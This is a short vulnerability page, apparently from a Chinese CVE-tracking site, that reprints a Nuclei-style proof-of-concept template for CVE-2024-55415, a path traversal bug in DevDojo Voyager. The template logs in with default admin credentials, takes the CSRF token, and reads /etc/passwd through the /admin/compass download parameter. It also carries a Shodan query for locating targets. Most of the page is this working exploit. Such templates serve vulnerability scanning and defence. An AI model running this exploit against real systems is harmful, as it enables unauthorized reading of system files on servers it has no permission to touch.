漏洞描述
DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
CVE-2024-55415: DevDojo Voyager <=1.8.0 - Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-55415
info:
name: DevDojo Voyager <=1.8.0 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
reference:
- https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
- https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L213
- https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44
- https://nvd.nist.gov/vuln/detail/CVE-2024-55415
classification:
cve-id: CVE-2024-55415
epss-score: 0.36555
epss-percentile: 0.97021
metadata:
verified: true
max-request: 4
shodan-query: title:"Voyager"
tags: cve,cve2024,devdojo,voyager,lfr,lfi
variables:
username: "admin@admin.com"
password: "password"
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: csrf
group: 1
regex:
- 'name="_token" value="([a-zA-Z0-9]+)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_token={{csrf}}&email={{username}}&password={{password}}&
matchers:
- type: dsl
dsl:
- "contains(body,'/admin</title>')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- status_code == 200
condition: and
# digest: 4a0a00473045022100ad6e2ada033d9caef2b73f54c9f6205d791be99cde8893cb77ef83ed349a721202200872779bce946d576d27194a2d98d8bec7ebf466368274267bd179fcddead716:922c64590222798bb761d5b6d8e72950